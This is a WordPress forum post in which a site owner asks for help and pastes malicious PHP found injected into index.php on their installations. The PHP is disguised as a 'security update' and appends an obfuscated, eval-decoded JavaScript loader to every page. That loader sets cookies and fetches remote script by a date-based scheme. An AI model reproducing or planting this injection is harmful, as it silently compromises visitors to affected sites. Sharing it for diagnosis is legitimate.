Hacker attacks: index..php in root folder

  • c-bass

    (@c-bass)


    14 years, 5 months ago

    hey,

    since 1 week i get in all wordpress installations hacker/bots attacks.

    in the root folder they put in index.php the following code:

    <?php 

ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z64bZ3dZ227FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07Z22;ddZ3dZ22!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+0~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+0iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z22;ceZ3dZ2268aZ2572CodZ2565At(Z2530)^Z2528Z25270x0Z2530Z2527+eZ2573Z2529)Z2529Z253b}}Z22;ccZ3dZ22elZ2565ngtZ2568;i+Z252b)Z257btmZ2570Z253dds.Z2573licZ2565(iZ252ci+1Z2529;sZ22;dzZ3dZ22Z2566unZ2563Z2574iZ256fZ256eZ2520dw(Z2574)Z257bZ2563aZ253dZ2527Z252564oZ252563umeZ25256eZ2574Z25252eZ2577rZ2525Z25369Z2574Z252565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z2570Z252574Z252520lZ2561nZ25256Z2537Z2575Z2561gZ25256Z2535Z25253dZ25255cZ252522Z256aavaZ2573crZ252569Z2570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscrZ252569pZ25257Z2534Z25253eZ2527;evZ2561Z256c(uZ256eZ2565Z2573caZ2570eZ2528tZ2529)}Z253bZ22;cdZ3dZ22Z2574Z253dst+Z2553trZ2569Z256egZ252efroZ256dChaZ2572CZ256fde(Z2528tmZ2570.cZ25Z22;czZ3dZ22Z2566uncZ2574ioZ256e Z2563zZ2528cZ257aZ2529Z257brZ2565tZ2575Z2572nZ2520Z2563a+cZ2562+ccZ252bcZ2564+ceZ252bZ2563z;}Z253bZ22;dcZ3dZ22wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7<code>7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSxZ22;cbZ3dZ2270Z2565(dZ2573);sZ2574Z253dtZ256dpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563Z2573(Z2563Z2575,1Z2534)Z2529;Z2522;Z22;deZ3dZ22Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+Z2519dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0Z3d0#9050$9;0!Z2520M+4q-4qZ3ebu</code>|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;caZ3dZ22Z2566unZ2563Z2574iZ256fn dZ2563Z2573(dsZ252ceZ2573Z2529Z257bdsZ253duneZ2573caZ25Z22;cuZ3dZ22(p}b4g<code>mxq)6b}g}v}x}</code>m.|}ppqz6*(}rfuyq4gfw)6|<code></code>d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p<code>|)Z25$$4|q}s|</code>),$*(;}rfuyq*(;p}b*Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522Z25220660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522!90660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dZ2573tZ253bdZ2563Z2573(Z2564Z2561+Z2564bZ252bdZ2563Z252bZ2564Z2564+Z2564Z2565,Z25310Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253dZ2524Z2561;Z2522Z253bZ22;Z69f Z28doZ63uZ6deZ6etZ2ecooZ6bZ69e.iZ6eZ64exZ4fZ66(Z27rf5Z66Z36dsZ27)Z3dZ3d-1)Z7bfunctiZ6fZ6e cZ61llbZ61ckZ28x)Z7b wZ69ndoZ77.tZ77 Z3d x;Z76arZ20d Z3d Z6eeZ77 DZ61tZ65Z28Z29;d.Z73Z65tZ54iZ6de(xZ5bZ22aZ73_oZ66Z22]*10Z300Z29;vZ61r hZ20Z3d d.getZ55TZ43HouZ72sZ28);wZ69ndoZ77.hZ20Z3d h;Z69f (Z68 Z3e 8)Z7bZ77Z69Z6eZ64ow.Z67Z64 Z3d Z64;Z73Z63(Z27rf5Z666dZ73Z27,2,7Z29;Z65vZ61Z6c(Z75neZ73cZ61pe(Z64z+Z63Z7aZ2boZ70Z2bsZ74)+Z27dw(dZ7a+Z63Z7a(Z24a+sZ74)Z29;Z27);Z64Z6fcZ75Z6deZ6etZ2ewrZ69tZ65Z28$a)Z3bZ7deZ6csZ65Z7bd.sZ65tZ55TCZ44Z61tZ65(Z64.geZ74Z55TCDZ61tZ65Z28) Z2d Z32Z29Z3bZ77iZ6edowZ2eZ67Z64 Z3d d;Z76aZ72 tiZ6de Z3d neZ77Z20Z41Z72Z72ayZ28);Z76ar Z73hZ69ftZ49ndeZ78 Z3d Z22Z22;timZ65[Z22yeZ61Z72Z22] Z3d dZ2eZ67eZ74Z55TCZ46ullZ59earZ28);tZ69me[Z22Z6donZ74hZ22] Z3dZ20Z64Z2egZ65tUZ54Z43MonZ74h()Z2b1;Z74imZ65[Z22dZ61Z79Z22] Z3d Z64Z2eZ67etUZ54CDZ61tZ65()Z3bif Z28dZ2egeZ74UTCZ4dZ6fZ6eZ74hZ28Z29Z2b1 Z3c 10Z29Z7bsZ68iftZ49nZ64eZ78 Z3d tiZ6deZ5bZ22yeZ61Z72Z22] +Z20Z22-Z30Z22 +Z20Z28dZ2egeZ74UTCZ4dZ6fnthZ28)+1Z29;}Z65lseZ7bZ73hiZ66tZ49Z6edexZ20Z3d tZ69meZ5bZ22yeZ61rZ22]Z20+Z20Z22-Z22 + Z28dZ2eZ67etUZ54CZ4doZ6etZ68Z28)+1Z29;Z7dZ69fZ20(d.Z67etZ55TCDZ61te(Z29 Z3c 10)Z7bZ73hiZ66Z74Z49ndZ65Z78 Z3dsZ68ifZ74Z49ndZ65x Z2b Z22-0Z22 + dZ2egetZ55Z54CDaZ74eZ28);}Z65lseZ7bZ73Z68Z69fZ74Z49Z6edeZ78 Z3d sZ68ifZ74Z49Z6edexZ20Z2b Z22-Z22 + Z64.gZ65tUZ54CDaZ74eZ28Z29;}Z64ocZ75mZ65ntZ2ewriZ74Z65Z28Z22Z3cscrZ22+Z22ipt lanZ67uagZ65Z3djavZ61scZ72Z69ptZ22+Z22 sZ72cZ3dZ27hZ74tpZ3aZ2fZ2fseaZ72chZ2etZ77Z69Z74terZ2ecomZ2ftrZ65nZ64sZ2fdaiZ6cy.jZ73on?Z64Z61Z74eZ3dZ22+ shZ69ftZ49nZ64ex+Z22&Z63Z61llbZ61ckZ3dcalZ6cbaZ63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}} funcZ74ionZ20calZ6cbZ61ck2Z28xZ29Z7bwindZ6fw.tZ77 Z3d x;sZ63(Z27rf5Z66Z36dsZ27Z2c2Z2c7);Z65valZ28unZ65scZ61pe(Z64z+cZ7aZ2bopZ2bstZ29+Z27Z64Z77(dZ7aZ2bcZ7aZ28Z24Z61+stZ29);Z27);Z64ocZ75menZ74.wZ72itZ65(Z24aZ29Z3b}doZ63uZ6dZ65nt.Z77Z72itZ65(Z22Z3cimg Z73rZ63Z3dZ27httpZ3aZ2fZ2fsearch.tZ77itZ74erZ2eZ63oZ6dZ2fimageZ73Z2fsearZ63Z68Z2frZ73s.pZ6egZ27 wiZ64Z74Z68Z3d1 heigZ68tZ3d1 sZ74yleZ3dZ27visiZ62iliZ74y:Z68Z69dZ64eZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6canZ67Z75aZ67Z65Z3djZ61Z76ascZ72ipZ74Z22+Z22 Z73rcZ3dZ27http:Z2fZ2fseZ61Z72ch.Z74Z77iZ74teZ72.cZ6fmZ2ftrZ65Z6edZ73Z2fdaZ69lZ79.Z6asZ6fn?Z63Z61lZ6cbZ61ckZ3dZ63alZ6cbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6cseZ7b$aZ3dZ27Z27};fuZ6ecZ74Z69Z6fn Z73cZ28cZ6eZ6d,Z76,edZ29Z7bvarZ20exZ64Z3dneZ77Z20DZ61te(Z29;exZ64Z2eseZ74DatZ65(Z65xd.Z67eZ74DatZ65Z28)+Z65d)Z3bdoZ63umZ65nZ74.Z63Z6fokZ69eZ3dcZ6emZ2b Z27Z3dZ27 +escZ61pZ65(vZ29+Z27;expZ69reZ73Z3dZ27+exd.toZ47MTZ53tZ72iZ6eZ67Z28)Z3b};\";function z(s){r=\"\";for(i=0;i<s.length;i++){if(s.charAt(i)==\"Z\"){s1=\"%\"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>";}

//important security update ?>

    please help out! i am updating to 2.8.6 now.

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Hacker attacks: index..php in root folder’ is closed to new replies.

Tags